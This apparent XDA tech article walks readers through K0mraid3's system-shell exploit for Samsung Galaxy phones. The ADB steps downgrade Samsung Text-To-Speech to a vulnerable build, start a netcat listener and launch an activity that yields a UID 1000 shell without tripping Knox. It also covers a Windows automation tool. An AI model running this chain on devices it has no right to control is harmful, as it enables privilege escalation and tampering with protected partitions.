Quick Links

On the first Monday of every month, Google publishes the Android Security Bulletin. It discloses all the mitigated security vulnerabilities across various components of the Android OS as well as the Linux kernel and their patches submitted by Google themselves or other third parties to that date. Large OEMs like Samsung have their own take on Android, so they opt to roll their own patches and updates into security updates as well.

With that said, it's quite hard to take care of every loophole. There exists a plethora of attack vectors, and sometimes you can craft your own exploit chain based on a previously known vulnerability just because you have a new method to circumvent one of the safeguards. This is exactly what XDA Senior Member K0mraid3 did with a four-year-old vulnerability, which allowed him to get system shell access on every Samsung Galaxy device — including the latest flagship ones — out there. While it's not the same as having root privileges, it's a sufficiently high local privilege escalation.

The primary entry point of the vulnerability lies within Samsung Text-To-Speech (package name: com.samsung.SMT), a preloaded system app that can be found on every Samsung Galaxy device. The idea is to downgrade the installed version of the app to a specific vulnerable build (v3.0.02.2 to be precise), and then force it to load a library, which in turn opens a shell with system privilege (UID 1000).

If you want to learn more about the exploit, be sure to check out XDA Lead Technical Editor Adam Conway's explainer. He spoke to K0mraid3 in order to grasp the full scope of this exploit and how it works.

  1. To reiterate, this is not root (UID 0) access, but the system shell access is powerful enough to execute a bunch of otherwise restricted binaries.
  2. K0mraid3’s proof of concept requires a helper APK, and you need to run it at least once before launching the exploit chain.
  3. One UI, i.e. Samsung’s custom Android skin’s built-in power saving routines can be troublesome, as they might hamper the communication between the TTS app, the helper APK, and the shell. Thus, we suggest setting the power saving profile to “Unrestricted” for the apps beforehand.
Samsung TTS battery saving profile set to unrestricted

Prerequisites

  1. Download the pre-compiled build of the exploit from the XDA forum thread or the official GitHub repository linked below: K0mraid3s System Shell Exploit
  2. Extract the archive somewhere and you should find the vulnerable version of the Samsung Text-To-Speech APK (samsungTTSVULN2.apk), the helper app (Komraid3s_POC_Vx.x.apk), and a Windows executable named systemshell-vx.x.exe.
  3. Make sure that the latest version of ADB is installed on your PC/Mac/Chromebook. Also, remember to install/update the Samsung USB drivers if you’re a Windows user.

How to exploit any Samsung Galaxy device to get system shell access

Manual method

  1. Connect the target Galaxy device to your PC with USB debugging turned on, make sure that it’s discoverable by ADB, then install the helper app. 
    adb install Komraid3s_POC_Vx.x.apk
    • As mentioned earlier, open the helper app at least once before proceeding to the next step.

  2. Now push the vulnerable version of the Samsung TTS app to /data/local/tmp and change its permissions: 
    adb push samsungTTSVULN2.apk /data/local/tmp
    adb shell chmod 777 /data/local/tmp/samsungTTSVULN2.apk
  3. Reboot the device. As soon as you’re on the homescreen, run the following command to replace the already installed version of the Samsung TTS app with the vulnerable one: 
    adb shell pm install -r -d -f -g --full --install-reason 3 --enable-rollback /data/local/tmp/samsungTTSVULN2.apk
    • If everything goes right, then you should see a "Success" message on the console.

  4. Open a shell on the target device by opening another terminal window and executing adb shell, then execute the Netcat binary, and listen for an incoming connection on the 9997 port with the following command: 
    adb shell nc -lp 9997
  5. At this stage, we need to execute a specific activity of the Samsung TTS app, which will open the system shell for us.
    • Use a third-party app like this to create a shortcut of the “com.samsung.SMT/.gui.DownloadList” activity.
    • You can also use Android’s own activity manager (am) to do the same. In that case, you can execute it via ADB (adb shell am start -n com.samsung.SMT/.gui.DownloadList) or use a terminal emulator app on your phone/tablet like Termux and run the following command: 
      am start -n com.samsung.SMT/.gui.DownloadList

  6. Switch back to the first shell, and you should see a new prompt with system (UID 1000) privilege.

Automated method

To make things easier, K0mraid3 also provides an easy-to-use GUI application to automate most of the tasks. Keep in mind that the GUI app is Windows-only, so if you’re a Linux/macOS user, it’s better to stick with the manual method.

  1. Connect the target Galaxy device to your PC with USB debugging on, make sure that it’s discoverable by ADB, then install the helper app. 
    adb install Komraid3s_POC_Vx.x.apk
    • As mentioned earlier, open the helper app at least once before proceeding to the next step.

  2. With the target device discoverable by ADB, run the systemshell-vx.x.exe on the host PC.
  3. Click on the “START SHELL” button. The app will automatically downgrade the Samsung TTS app and try to open the system shell.
    • On your phone/tablet, you might see the TTS app prompting you to download some voice data. There's no need to interact with those options, as they have nothing to do with the exploit.
    • In case the app hangs or fails to open the shell window after some time, close it, reboot the target Galaxy device, and start over.
    • The Galaxy Store app can automatically update and/or reset the power saving profile of the TTS app in background, so make sure to check it before starting the process from scratch.

Verification

Once you've the shell access, you can verify the privilege level using one of the commands below: 

  • whoami
    • The output should be “system” 

  • id -u
    • The output should be “1000”

System shell access on a Samsung Galaxy device

Conclusion

The typical way to achieve root access on an Android device is to first unlock the bootloader, which allows you to boot third-party binaries. Since Android's security model basically falls apart with root, this step is intentionally disabling one of the key security features on the device, which is why the user has to explicitly allow it to happen by typically enabling a toggle in Developer Options and then issuing an unlock command to the bootloader. Once the bootloader is unlocked, the user can introduce a superuser binary to the system and also a superuser management app (like Magisk) to control which processes have access to root.

With the system shell exploit mentioned above, however, the user does not have to unlock the bootloader to get an escalated privilege. Although it's far from being root, the "system" user is capable enough to access a number of low-level partitions (such as /efs), start various service and debugging tools, and alter many protected prop values — all without even tripping Knox. These examples only touch on a few ways; a malicious actor can combine this with other vulnerabilities and come up with more nefarious actions.

We'll have to wait and see how Google and Samsung tackle the scenario. Either way, you should probably disable or remove the Samsung Text-To-Speech app for the time being.